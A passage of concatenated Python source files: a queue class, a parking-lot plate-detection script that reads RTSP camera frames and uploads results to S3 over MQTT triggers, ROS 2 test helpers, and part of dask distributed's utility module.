        self._closed = False

    def size(self):
        """Number of queued items."""
        with self._lock:
            return len(self._things)

    def close(self):
        """Stop accepting new items; pop() keeps working."""
        with self._lock:
            self._closed = True

    def closed(self):
        with self._lock:
            return self._closed

    def add(self, thing):
        """Add an item; returns False when closed, True when appended.

        At capacity a random existing slot is overwritten instead
        (and, as in the original, nothing is returned in that case).
        """
        with self._lock:
            if self._closed:
                return False
            has_room = self._max_size <= 0 or len(self._things) < self._max_size
            if has_room:
                self._things.append(thing)
                return True
            slot = random.randrange(0, len(self._things))
            self._things[slot] = thing

    def pop(self):
        """Return every queued item as a list, or None when empty."""
        with self._lock:
            popped, self._things = self._things, []
            return popped if popped else None
|
main.py | #-*- coding:utf-8 -*-
from detect_simple import detect
from PIL import Image
import paho.mqtt.client as mqtt
import cv2
import argparse
import time
import threading
import queue
import datetime as dt
from pprint import pprint
import json
import re
import boto3
from botocore.exceptions import ClientError
import os
# IAM ID, Key Setting
my_id = ''
my_key = ''
q = queue.Queue()
def on_connect(client, userdata, flags, rc):
    """MQTT connect callback: rc == 0 means the broker accepted us."""
    if rc != 0:
        print("Bad connection Returned code=", rc)
    else:
        print("connected OK")
def on_disconnect(client, userdata, flags, rc=0):
    """MQTT disconnect callback: log the result code."""
    print(f"{rc}")
def on_subscribe(client, userdata, mid, granted_qos):
    """MQTT subscribe callback: log message id and granted QoS."""
    print(f"subscribed: {mid} {granted_qos}")
# detect parking
def on_message(client, userdata, msg):
    """MQTT message handler: parse 'camera-location-InOut' and enqueue a
    detection job for the worker thread."""
    # B1/B2 - A1 A2 A3 - In/out
    camera, location, In_out = msg.payload.decode("utf-8").split('-')
    print()
    print("=============================")
    print(f"detect 감지 : {camera} - {location} - {In_out}")
    print("=============================")
    print()
    info = {
        "parkingLotIndex": 1,
        "section": camera,
        "type": In_out,
        "createdAt": dt.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
    }
    q.put((location, info))
# 카메라 스냅샷
def detect_Snapshot(camera):
    """Grab one frame from *camera*'s RTSP stream, save it locally and
    return the image path (None on failure).

    Fixes: an unknown camera id previously crashed with UnboundLocalError
    on ``url``; the VideoCapture handle was never released.
    """
    if camera == "B1":
        url = 'rtsp://id:password@192.168.0.23/'
    elif camera == "B2":
        url = 'rtsp://id:password@192.168.0.23/'  # TODO: switch to .24
    else:
        print("Snapshot Error!")
        return None
    cap = cv2.VideoCapture(url)
    try:
        ret, image = cap.read()
    finally:
        # Release the stream handle even if the read fails.
        cap.release()
    if not ret:
        print("Snapshot Error!")
        return None
    # TODO: remove later (temporary local save for debugging)
    if camera == "B1":
        cv2.imwrite('./camera/camera1.jpg', image)
        img_path = './camera/camera1.jpg'
    elif camera == "B2":
        cv2.imwrite('./camera/camera2.jpg', image)
        img_path = './camera/camera2.jpg'
    return img_path
def start(location, info):
    """Run plate detection for one event (or a full snapshot) and build the
    result payload uploaded to S3."""
    camera = info["section"]
    In_out = info["type"]
    #img_path = detect_Snapshot(camera)
    img_path = './camera/camera1.jpg'
    jdict = {"info": info}
    if location == "snapshot":
        # Full-lot snapshot: detect() returns one entry per slot.
        jdict["data"] = detect(img_path, location)
        return jdict
    # Single-slot event: record it as a parking state change.
    info["type"] = "parking"
    if In_out == "In":
        results = detect(img_path, location)
        data = results[int(location[-1]) - 1]
    elif In_out == "Out":
        data = {"location": location, "inOut": "out"}
    jdict["data"] = [data]
    return jdict
def subscribing():
    # Blocks forever, dispatching incoming MQTT messages to on_message.
    client.on_message = on_message
    client.loop_forever()
def Timesnap():
    """Enqueue a full-lot snapshot job for each camera, then re-arm itself
    to run again in 3 minutes."""
    print()
    print("=============================")
    print("SNAPSHOT")
    print("=============================")
    print()
    for section in ("B1", "B2"):
        info = {
            "parkingLotIndex": 1,
            "section": section,
            "type": "snapshot",
            "createdAt": dt.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
        }
        q.put(("snapshot", info))
    threading.Timer(180, Timesnap).start()
def event_queue():
    """Worker loop: consume detection jobs from the queue, run them and
    upload the results."""
    while True:
        loc, payload = q.get()
        print()
        print("=============================")
        print(f"detect start : {loc}")
        print("=============================")
        result = start(loc, payload)  # snapshot A1 A2 A3
        saved_json_image(result)
        print("=============================")
        print(f"detect {loc} end")
        print("=============================")
        print()
        q.task_done()
s3 = boto3.client(
's3', # s3 service
aws_access_key_id=my_id, # Access ID
aws_secret_access_key=my_key) # Secret Access Key
def create_s3_bucket(bucket_name):
    """Create the S3 bucket in ap-northeast-2, tolerating that it already
    exists.

    Returns the create_bucket response, or None when the bucket already
    existed or an unknown error occurred (best-effort by design).
    """
    print("Creating a bucket... " + bucket_name)
    try:
        response = s3.create_bucket(
            Bucket=bucket_name,
            CreateBucketConfiguration={
                'LocationConstraint': 'ap-northeast-2'  # Seoul Region
            }
        )
        return response
    except ClientError as e:
        if e.response['Error']['Code'] == 'BucketAlreadyOwnedByYou':  # If already have bucket
            print("Bucket already exists. skipping..")
        else:
            print("Unknown error, exit..")
def saved_json_image(jdict):
    """Upload the cropped plate images and the result JSON for one event
    to the S3 bucket.

    Fix: ``json_Url`` (and ``numbers``) were only assigned inside the
    ``'in'`` branch of the loop, so an event containing no incoming cars
    crashed with UnboundLocalError at the final upload; they are now
    computed up front.
    """
    response = create_s3_bucket("parking-management-s3")  # Bucket Name Setting
    print("Bucket : " + str(response))
    files = []
    stored_names = []
    section = jdict['info']['section'][-1]
    # Timestamp digits form the unique part of every S3 object key.
    numbers = re.sub(r'[^0-9]', '', jdict['info']['createdAt'])
    json_Url = f"carData/{numbers}.json"
    for i in range(len(jdict['data'])):
        if jdict['data'][i]['inOut'] == 'in':
            loc = jdict['data'][i]['location'][-1]
            files.append(f'./detections/crop/camera{section}/license_plate_{loc}.jpg')
            img_Url = f"carImg/{numbers}_A{loc}.jpg"
            jdict['data'][i]['imgUrl'] = img_Url
            stored_names.append(img_Url)
    pprint(jdict)
    for file, stored_name in zip(files, stored_names):
        print(file, stored_name)
        s3.upload_file(file, "parking-management-s3", stored_name)
    with open("./result/data.json", "w") as f:
        json.dump(jdict, f)
    s3.upload_file("./result/data.json", "parking-management-s3", json_Url)
if __name__ == '__main__':
    # The MQTT wiring below is disabled; the script currently runs a single
    # hard-coded "B1 / A1 / In" event end-to-end for local testing.
    '''
    client = mqtt.Client()
    # 콜백 함수 설정 on_connect(브로커에 접속), on_disconnect(브로커에 접속중료), on_subscribe(topic 구독),
    # on_message(발행된 메세지가 들어왔을 때)
    client.on_connect = on_connect
    client.on_disconnect = on_disconnect
    client.on_subscribe = on_subscribe
    # address : localhost, port: 1883 에 연결
    client.connect('192.168.0.33', 1883)
    # common topic 으로 메세지 발행
    client.subscribe('test', 1)
    sub = threading.Thread(target = subscribing)
    event_queue = threading.Thread(target=event_queue, daemon=True)
    sub.start()
    Timesnap()
    event_queue.start()
    '''
    info = {"parkingLotIndex" : 1, "section" : "B1", "type": "In", "createdAt": dt.datetime.now().strftime("%Y-%m-%d %H:%M:%S")}
    jdict = start("A1",info)
    saved_json_image(jdict)
utils.py | # Copyright 2018 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import os
import random
import subprocess
import sys
import tempfile
import threading
import rclpy
def require_environment_variable(name):
    """Get environment variable or raise if it does not exist."""
    try:
        return os.environ[name]
    except KeyError:
        raise EnvironmentError('Missing environment variable "%s"' % name)
class HelperCommand:
    """Execute a command in the background for the duration of a
    ``with`` block."""

    def __init__(self, command):
        self._env = dict(os.environ)
        self._command = copy.deepcopy(command)
        # Run *.py helpers with the same interpreter as this test process,
        # unbuffered so output appears promptly.
        if command[0].endswith('.py'):
            self._command = [sys.executable, *self._command]
            self._env['PYTHONUNBUFFERED'] = '1'

    def __enter__(self):
        self._proc = subprocess.Popen(self._command, env=self._env)
        return self

    def __exit__(self, t, v, tb):
        # Hard-kill: helpers are disposable test processes.
        self._proc.kill()
class TemporaryFileWithContent:
    """Create a named temporary file with content; the file lives for the
    duration of the ``with`` block."""

    def __init__(self, content):
        self._tempdir = tempfile.TemporaryDirectory(prefix='test_cli_')
        self._content = content

    def __enter__(self):
        directory = self._tempdir.__enter__()
        name = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for _ in range(10))
        self._filename = os.path.join(directory, name)
        # Write then close immediately so the file can be reopened on Windows.
        self._file = open(self._filename, mode='w')
        try:
            self._file.write(self._content)
            self._file.flush()
        finally:
            self._file.close()
        return self._file.name

    def __exit__(self, t, v, tb):
        # Removing the temp directory also removes the file.
        self._tempdir.__exit__(t, v, tb)
class BackgroundExecutor:
    """Spin an executor in the background.

    Fix: ``__enter__`` now returns ``self`` so ``with BackgroundExecutor(n)
    as bg:`` binds the instance instead of None (the context-manager
    protocol expects a useful return value).
    """

    def __init__(self, node, time_between_spins=0.25):
        self._node = node
        # Upper bound on how long __exit__ waits for the loop to notice _stop.
        self._time_between_spins = time_between_spins

    def __enter__(self):
        self._stop = threading.Event()
        self._thr = threading.Thread(target=self._run, daemon=True)
        self._thr.start()
        return self

    def _run(self):
        # Spin with a timeout so the stop event is polled regularly.
        while not self._stop.is_set():
            rclpy.spin_once(self._node, timeout_sec=self._time_between_spins)

    def __exit__(self, t, v, tb):
        self._stop.set()
        self._thr.join()
|
utils.py | import asyncio
import functools
import html
import importlib
import inspect
import json
import logging
import multiprocessing
import os
import pkgutil
import re
import shutil
import socket
import sys
import tempfile
import threading
import warnings
import weakref
import xml.etree.ElementTree
from asyncio import TimeoutError
from collections import OrderedDict, UserDict, deque
from concurrent.futures import CancelledError, ThreadPoolExecutor # noqa: F401
from contextlib import contextmanager, suppress
from hashlib import md5
from importlib.util import cache_from_source
from time import sleep
import click
import tblib.pickling_support
try:
import resource
except ImportError:
resource = None
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from dask import istask
# Import config serialization functions here for backward compatibility
from dask.config import deserialize as deserialize_for_cli # noqa
from dask.config import serialize as serialize_for_cli # noqa
# provide format_bytes here for backwards compatibility
from dask.utils import ( # noqa: F401
format_bytes,
format_time,
funcname,
parse_bytes,
parse_timedelta,
)
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import PYPY, WINDOWS
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
# For some reason this is required in python >= 3.9
if WINDOWS:
import multiprocessing.popen_spawn_win32
else:
import multiprocessing.popen_spawn_posix
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
    """Pick the multiprocessing context for worker processes.

    On Windows/PyPy the plain multiprocessing module is used; elsewhere the
    method comes from dask config, and forkserver children preload common
    packages.
    """
    if WINDOWS or PYPY:
        return multiprocessing
    else:
        method = dask.config.get("distributed.worker.multiprocessing-method")
        ctx = multiprocessing.get_context(method)
        # Makes the test suite much faster
        preload = ["distributed"]
        if "pkg_resources" in sys.modules:
            preload.append("pkg_resources")
        from .versions import optional_packages, required_packages

        # Only preload packages that are actually importable here.
        for pkg, _ in required_packages + optional_packages:
            try:
                importlib.import_module(pkg)
            except ImportError:
                pass
            else:
                preload.append(pkg)
        ctx.set_forkserver_preload(preload)
        return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
    """
    Whether the function takes an argument with the given name,
    unwrapping decorated callables via ``__wrapped__``.
    """
    current = func
    while current is not None:
        try:
            if argname in inspect.getfullargspec(current).args:
                return True
        except TypeError:
            # Not introspectable (e.g. some builtins).
            return False
        # For Tornado coroutines and other decorated functions.
        current = getattr(current, "__wrapped__", None)
    return False
def get_fileno_limit():
    """
    Get the maximum number of open files per process.
    """
    if resource is None:
        # Default ceiling for Windows when using the CRT, though it
        # is settable using _setmaxstdio().
        return 512
    soft, _hard = resource.getrlimit(resource.RLIMIT_NOFILE)
    return soft
@toolz.memoize
def _get_ip(host, port, family):
    """Return the local address used to reach (*host*, *port*) for *family*."""
    # By using a UDP socket, we don't actually try to connect but
    # simply select the local address through which *host* is reachable.
    sock = socket.socket(family, socket.SOCK_DGRAM)
    try:
        sock.connect((host, port))
        ip = sock.getsockname()[0]
        return ip
    except EnvironmentError as e:
        # Fall back to an address attached to our hostname (which may be
        # a loopback address on misconfigured systems).
        warnings.warn(
            "Couldn't detect a suitable IP address for "
            "reaching %r, defaulting to hostname: %s" % (host, e),
            RuntimeWarning,
        )
        addr_info = socket.getaddrinfo(
            socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
        )[0]
        return addr_info[4][0]
    finally:
        sock.close()
def get_ip(host="8.8.8.8", port=80):
    """
    Get the local IP address through which the *host* is reachable.

    *host* defaults to a well-known Internet host (one of Google's public
    DNS servers). The result is memoized via _get_ip.
    """
    return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
    """
    The same as get_ip(), but for IPv6 (defaults to Google's public
    IPv6 DNS server).
    """
    return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
    """
    Get the local IPv4 address of a network interface.

    ValueError is raised if the interface doesn't exist or if it does not
    have an IPv4 address associated with it.  (The code raises ValueError
    for both cases, not KeyError as previously documented.)
    """
    import psutil

    net_if_addrs = psutil.net_if_addrs()
    if ifname not in net_if_addrs:
        allowed_ifnames = list(net_if_addrs.keys())
        raise ValueError(
            "{!r} is not a valid network interface. "
            "Valid network interfaces are: {}".format(ifname, allowed_ifnames)
        )
    for info in net_if_addrs[ifname]:
        if info.family == socket.AF_INET:
            return info.address
    raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
# FIXME: this breaks if changed to async def...
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
    """Process list of coroutines, ignoring certain exceptions.

    Results of coroutines that raise a suppressed exception are simply
    dropped from the returned list.

    >>> coroutines = [cor(...) for ...] # doctest: +SKIP
    >>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
    """
    wait_iterator = gen.WaitIterator(*coroutines)
    results = []
    # Collect results in completion order.
    while not wait_iterator.done():
        with suppress(*exceptions):
            result = yield wait_iterator.next()
            results.append(result)
    raise gen.Return(results)
async def All(args, quiet_exceptions=()):
    """Wait on many tasks at the same time

    Err once any of the tasks err.

    See https://github.com/tornadoweb/tornado/issues/1546

    Parameters
    ----------
    args: futures to wait for
    quiet_exceptions: tuple, Exception
        Exception types to avoid logging if they fail
    """
    tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
    # Results stored at the position of the task that produced them, so the
    # returned list matches the order of *args* regardless of completion order.
    results = [None for _ in args]
    while not tasks.done():
        try:
            result = await tasks.next()
        except Exception:

            @gen.coroutine
            def quiet():
                """Watch unfinished tasks

                Otherwise if they err they get logged in a way that is hard to
                control. They need some other task to watch them so that they
                are not orphaned
                """
                for task in list(tasks._unfinished):
                    try:
                        yield task
                    except quiet_exceptions:
                        pass

            quiet()
            raise
        results[tasks.current_index] = result
    return results
async def Any(args, quiet_exceptions=()):
    """Wait on many tasks at the same time and return when any is finished

    Err once any of the tasks err.

    Parameters
    ----------
    args: futures to wait for
    quiet_exceptions: tuple, Exception
        Exception types to avoid logging if they fail
    """
    tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
    results = [None for _ in args]
    while not tasks.done():
        try:
            result = await tasks.next()
        except Exception:

            @gen.coroutine
            def quiet():
                """Watch unfinished tasks

                Otherwise if they err they get logged in a way that is hard to
                control. They need some other task to watch them so that they
                are not orphaned
                """
                for task in list(tasks._unfinished):
                    try:
                        yield task
                    except quiet_exceptions:
                        pass

            quiet()
            raise
        results[tasks.current_index] = result
        # Unlike All(): stop after the first completed task.
        break
    return results
def sync(loop, func, *args, callback_timeout=None, **kwargs):
    """
    Run coroutine in loop running in separate thread.

    Schedules ``func(*args, **kwargs)`` on *loop* (which runs in another
    thread), blocks the calling thread on an Event until the coroutine
    finishes, and re-raises any exception with its original traceback.

    Parameters
    ----------
    loop : tornado IOLoop running in a different thread
    func : coroutine function to run on the loop
    callback_timeout : optional timeout (timedelta spec) for the result
    """
    callback_timeout = parse_timedelta(callback_timeout, "s")
    # Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
    if PollIOLoop and (
        (isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False))
        or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed)
    ):
        raise RuntimeError("IOLoop is closed")
    try:
        if loop.asyncio_loop.is_closed():  # tornado 6
            raise RuntimeError("IOLoop is closed")
    except AttributeError:
        pass

    e = threading.Event()
    main_tid = threading.get_ident()
    # One-element lists so the inner coroutine can write results/errors
    # visible to this (outer) thread.
    result = [None]
    error = [False]

    @gen.coroutine
    def f():
        # We flag the thread state asynchronous, which will make sync() call
        # within `func` use async semantic. In order to support concurrent
        # calls to sync(), `asynchronous` is used as a ref counter.
        thread_state.asynchronous = getattr(thread_state, "asynchronous", 0)
        thread_state.asynchronous += 1
        try:
            if main_tid == threading.get_ident():
                raise RuntimeError("sync() called from thread of running loop")
            yield gen.moment
            future = func(*args, **kwargs)
            if callback_timeout is not None:
                future = asyncio.wait_for(future, callback_timeout)
            result[0] = yield future
        except Exception as exc:
            # Capture full exc_info so the traceback survives the thread hop.
            error[0] = sys.exc_info()
        finally:
            assert thread_state.asynchronous > 0
            thread_state.asynchronous -= 1
            e.set()

    loop.add_callback(f)
    if callback_timeout is not None:
        if not e.wait(callback_timeout):
            raise TimeoutError("timed out after %s s." % (callback_timeout,))
    else:
        while not e.is_set():
            # Wait in short slices so KeyboardInterrupt can interrupt us.
            e.wait(10)
    if error[0]:
        typ, exc, tb = error[0]
        raise exc.with_traceback(tb)
    else:
        return result[0]
class LoopRunner:
    """
    A helper to start and stop an IO loop in a controlled way.
    Several loop runners can associate safely to the same IO loop.

    Parameters
    ----------
    loop: IOLoop (optional)
        If given, this loop will be re-used, otherwise an appropriate one
        will be looked up or created.
    asynchronous: boolean (optional, default False)
        If false (the default), the loop is meant to run in a separate
        thread and will be started if necessary.
        If true, the loop is meant to run in the thread this
        object is instantiated from, and will not be started automatically.
    """

    # All loops currently associated to loop runners.
    # Maps loop -> (refcount, runner-that-owns-the-thread-or-None).
    _all_loops = weakref.WeakKeyDictionary()
    _lock = threading.Lock()

    def __init__(self, loop=None, asynchronous=False):
        current = IOLoop.current()
        if loop is None:
            if asynchronous:
                self._loop = current
            else:
                # We're expecting the loop to run in another thread,
                # avoid re-using this thread's assigned loop
                self._loop = IOLoop()
        else:
            self._loop = loop
        self._asynchronous = asynchronous
        self._loop_thread = None
        self._started = False
        with self._lock:
            # Register the loop with an initial (refcount=0, owner=None) entry.
            self._all_loops.setdefault(self._loop, (0, None))

    def start(self):
        """
        Start the IO loop if required.  The loop is run in a dedicated
        thread.

        If the loop is already running, this method does nothing.
        """
        with self._lock:
            self._start_unlocked()

    def _start_unlocked(self):
        # Caller must hold self._lock.
        assert not self._started

        count, real_runner = self._all_loops[self._loop]
        if self._asynchronous or real_runner is not None or count > 0:
            # The loop is (or will be) run by someone else; just take a ref.
            self._all_loops[self._loop] = count + 1, real_runner
            self._started = True
            return

        assert self._loop_thread is None
        assert count == 0

        loop_evt = threading.Event()
        done_evt = threading.Event()
        in_thread = [None]
        start_exc = [None]

        def loop_cb():
            # Runs on the loop: records which thread actually runs the loop.
            in_thread[0] = threading.current_thread()
            loop_evt.set()

        def run_loop(loop=self._loop):
            loop.add_callback(loop_cb)
            try:
                loop.start()
            except Exception as e:
                start_exc[0] = e
            finally:
                done_evt.set()

        thread = threading.Thread(target=run_loop, name="IO loop")
        thread.daemon = True
        thread.start()

        loop_evt.wait(timeout=10)
        self._started = True

        actual_thread = in_thread[0]
        if actual_thread is not thread:
            # Loop already running in other thread (user-launched)
            done_evt.wait(5)
            if not isinstance(start_exc[0], RuntimeError):
                if not isinstance(
                    start_exc[0], Exception
                ):  # track down infrequent error
                    raise TypeError("not an exception", start_exc[0])
                raise start_exc[0]
            self._all_loops[self._loop] = count + 1, None
        else:
            assert start_exc[0] is None, start_exc
            self._loop_thread = thread
            self._all_loops[self._loop] = count + 1, self

    def stop(self, timeout=10):
        """
        Stop and close the loop if it was created by us.
        Otherwise, just mark this object "stopped".
        """
        with self._lock:
            self._stop_unlocked(timeout)

    def _stop_unlocked(self, timeout):
        # Caller must hold self._lock.
        if not self._started:
            return

        self._started = False

        count, real_runner = self._all_loops[self._loop]
        if count > 1:
            # Other runners still use this loop; only drop our reference.
            self._all_loops[self._loop] = count - 1, real_runner
        else:
            assert count == 1
            del self._all_loops[self._loop]
            if real_runner is not None:
                real_runner._real_stop(timeout)

    def _real_stop(self, timeout):
        # Actually stop and close the loop we own, then join its thread.
        assert self._loop_thread is not None
        if self._loop_thread is not None:
            try:
                self._loop.add_callback(self._loop.stop)
                self._loop_thread.join(timeout=timeout)
                with suppress(KeyError):  # IOLoop can be missing
                    self._loop.close()
            finally:
                self._loop_thread = None

    def is_started(self):
        """
        Return True between start() and stop() calls, False otherwise.
        """
        return self._started

    def run_sync(self, func, *args, **kwargs):
        """
        Convenience helper: start the loop if needed,
        run sync(func, *args, **kwargs), then stop the loop again.
        """
        if self._started:
            return sync(self.loop, func, *args, **kwargs)
        else:
            self.start()
            try:
                return sync(self.loop, func, *args, **kwargs)
            finally:
                self.stop()

    @property
    def loop(self):
        # The IOLoop this runner is associated with.
        return self._loop
@contextmanager
def set_thread_state(**kwargs):
    """Temporarily set attributes on the module-level ``thread_state``.

    On exit each attribute is restored to its previous value, or removed
    if it did not exist before.
    """
    saved = {}
    for name in kwargs:
        try:
            saved[name] = getattr(thread_state, name)
        except AttributeError:
            pass  # attribute was absent; remember that by omission
    for name, value in kwargs.items():
        setattr(thread_state, name, value)
    try:
        yield
    finally:
        for name in kwargs:
            if name in saved:
                setattr(thread_state, name, saved[name])
            else:
                delattr(thread_state, name)
@contextmanager
def tmp_text(filename, text):
    """Create *filename* in the temp directory containing *text*.

    Yields the file's full path and removes the file on exit.
    """
    path = os.path.join(tempfile.gettempdir(), filename)
    with open(path, "w") as handle:
        handle.write(text)
    try:
        yield path
    finally:
        if os.path.exists(path):
            os.remove(path)
def clear_queue(q):
    """Discard every item currently waiting in queue *q*."""
    drain = q.get_nowait
    while not q.empty():
        drain()
def is_kernel():
    """Determine if we're running within an IPython kernel

    >>> is_kernel()
    False
    """
    # http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
    # Cheap short-circuit: if IPython was never imported, we can't be a kernel.
    if "IPython" not in sys.modules:
        return False
    from IPython import get_ipython

    # Kernels expose a `kernel` attribute on the interactive shell instance.
    shell = get_ipython()
    return getattr(shell, "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")


@functools.lru_cache(100000)
def key_split(s):
    """Extract the logical task-name prefix from a key.

    >>> key_split('x')
    'x'
    >>> key_split('x-1')
    'x'
    >>> key_split('x-1-2-3')
    'x'
    >>> key_split(('x-2', 1))
    'x'
    >>> key_split("('x-2', 1)")
    'x'
    >>> key_split('hello-world-1')
    'hello-world'
    >>> key_split(b'hello-world-1')
    'hello-world'
    >>> key_split('ae05086432ca935f6eba409a8ecd4896')
    'data'
    >>> key_split('<module.submodule.myclass object at 0xdaf372')
    'myclass'
    >>> key_split(None)
    'Other'
    >>> key_split('x-abcdefab')  # ignores hex
    'x'
    """
    if type(s) is bytes:
        s = s.decode()
    if type(s) is tuple:
        s = s[0]
    try:
        tokens = s.split("-")
        head = tokens[0]
        if not head[0].isalpha():
            # Keys like "('x-2', 1)": take the first tuple element, unquoted.
            head = head.split(",")[0].strip("'(\"")
        parts = [head]
        for token in tokens[1:]:
            # Stop at the first numeric or 8-char hex-looking token.
            if not token.isalpha() or (
                len(token) == 8 and hex_pattern.match(token) is not None
            ):
                break
            parts.append(token)
        result = "-".join(parts)
        if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
            return "data"
        if result[0] == "<":
            # repr() style keys: pull out the bare class name.
            result = result.strip("<>").split()[0].split(".")[-1]
        return result
    except Exception:
        return "Other"
def key_split_group(x):
    """A more fine-grained version of key_split

    >>> key_split_group(('x-2', 1))
    'x-2'
    >>> key_split_group("('x-2', 1)")
    'x-2'
    >>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
    'data'
    >>> key_split_group('<module.submodule.myclass object at 0xdaf372')
    'myclass'
    >>> key_split_group('x')
    'x'
    >>> key_split_group('x-1')
    'x'
    """
    kind = type(x)
    if kind is tuple:
        return x[0]
    if kind is bytes:
        return key_split_group(x.decode())
    if kind is str:
        if x[0] == "(":
            # Stringified tuple: first element, stripped of quoting.
            return x.split(",", 1)[0].strip("()\"'")
        if len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
            return "data"
        if x[0] == "<":
            return x.strip("<>").split()[0].split(".")[-1]
        return key_split(x)
    return key_split(x)
@contextmanager
def log_errors(pdb=False):
    """Log any exception escaping the wrapped block, then re-raise it.

    ``CommClosedError`` and tornado's ``gen.Return`` pass through untouched.
    With ``pdb=True`` a debugger is opened before re-raising.
    """
    from .comm import CommClosedError

    try:
        yield
    except (CommClosedError, gen.Return):
        raise
    except Exception as e:
        with suppress(TypeError):  # logger becomes None during process cleanup
            logger.exception(e)
        if pdb:
            import pdb

            pdb.set_trace()
        raise
def silence_logging(level, root="distributed"):
    """
    Change all StreamHandlers for the given logger to the given level

    Accepts a level name string ("ERROR") or a numeric level.  Returns the
    previous level of the last handler changed, or None if none matched.
    """
    if isinstance(level, str):
        level = getattr(logging, level.upper())

    previous = None
    for handler in logging.getLogger(root).handlers:
        if isinstance(handler, logging.StreamHandler):
            previous = handler.level
            handler.setLevel(level)
    return previous
@toolz.memoize
def ensure_ip(hostname):
    """Resolve *hostname* to an IP address string (memoized).

    Examples
    --------
    >>> ensure_ip('localhost')
    '127.0.0.1'
    >>> ensure_ip('123.123.123.123')  # pass through IP addresses
    '123.123.123.123'
    """
    # Prefer IPv4 over IPv6, for compatibility
    last_error = None
    for family in (socket.AF_INET, socket.AF_INET6):
        try:
            info = socket.getaddrinfo(
                hostname, 1234, family, socket.SOCK_STREAM  # dummy port number
            )
        except socket.gaierror as e:
            last_error = e
        else:
            return info[0][4][0]
    raise last_error
tblib.pickling_support.install()
def get_traceback():
    """Return the active exception's traceback, trimmed of framework frames.

    Leading frames originating in distributed's worker/scheduler modules,
    tornado's gen machinery or concurrent.futures are skipped.
    """
    noisy = (
        os.path.join("distributed", "worker"),
        os.path.join("distributed", "scheduler"),
        os.path.join("tornado", "gen.py"),
        os.path.join("concurrent", "futures"),
    )
    _, _, tb = sys.exc_info()
    while tb is not None and any(
        fragment in tb.tb_frame.f_code.co_filename for fragment in noisy
    ):
        tb = tb.tb_next
    return tb
def truncate_exception(e, n=10000):
    """Truncate exception to be about a certain length

    Returns *e* unchanged when its string form is at most *n* characters;
    otherwise builds a shortened replacement of the same type (falling
    back to a plain Exception if the type can't be constructed that way).
    """
    if len(str(e)) <= n:
        return e
    try:
        return type(e)("Long error message", str(e)[:n])
    except Exception:
        return Exception("Long error message", type(e), str(e)[:n])
def validate_key(k):
    """Validate a key as received on a stream.

    Keys must be exactly ``str`` or ``bytes`` (subclasses are rejected).
    """
    kind = type(k)
    if kind is not str and kind is not bytes:
        raise TypeError("Unexpected key type %s (value: %r)" % (kind, k))
def _maybe_complex(task):
    """Possibly contains a nested task

    True when *task* is itself a task, or is a list/dict any of whose
    elements (values, for dicts) may contain one.
    """
    if istask(task):
        return True
    if type(task) is list:
        return any(map(_maybe_complex, task))
    if type(task) is dict:
        return any(map(_maybe_complex, task.values()))
    return False
def seek_delimiter(file, delimiter, blocksize):
    """Seek current file to next byte after a delimiter bytestring

    This seeks the file to the next byte following the delimiter.  It does
    not return anything.  Use ``file.tell()`` to see location afterwards.
    A file positioned at offset 0 is left untouched.

    Parameters
    ----------
    file: a file
    delimiter: bytes
        a delimiter like ``b'\\n'`` or message sentinel
    blocksize: int
        Number of bytes to read from the file at once.
    """
    if file.tell() == 0:
        return

    tail = b""
    while True:
        chunk = file.read(blocksize)
        if not chunk:
            return
        # Keep the previous tail so delimiters spanning chunks are found.
        window = tail + chunk
        idx = window.find(delimiter)
        if idx != -1:
            # Rewind to just past this delimiter occurrence.
            file.seek(file.tell() - (len(window) - idx) + len(delimiter))
            return
        tail = window[-len(delimiter):]
def read_block(f, offset, length, delimiter=None):
    """Read a block of bytes from a file

    Parameters
    ----------
    f: file
        File-like object supporting seek, read, tell, etc..
    offset: int
        Byte offset to start read
    length: int
        Number of bytes to read
    delimiter: bytes (optional)
        Ensure reading starts and stops at delimiter bytestring

    If using the ``delimiter=`` keyword argument we ensure that the read
    starts and stops at delimiter boundaries that follow the locations
    ``offset`` and ``offset + length``.  If ``offset`` is zero then we
    start at zero.  The bytestring returned WILL include the
    terminating delimiter string.

    Examples
    --------
    >>> from io import BytesIO  # doctest: +SKIP
    >>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300')  # doctest: +SKIP
    >>> read_block(f, 0, 13)  # doctest: +SKIP
    b'Alice, 100\\nBo'
    >>> read_block(f, 0, 13, delimiter=b'\\n')  # doctest: +SKIP
    b'Alice, 100\\nBob, 200\\n'
    """
    if delimiter:
        # Snap the start of the read forward to the next delimiter boundary.
        f.seek(offset)
        seek_delimiter(f, delimiter, 2 ** 16)
        start = f.tell()
        # Snap the end forward as well, preserving the requested span.
        f.seek(start + length - (start - offset))
        seek_delimiter(f, delimiter, 2 ** 16)
        end = f.tell()
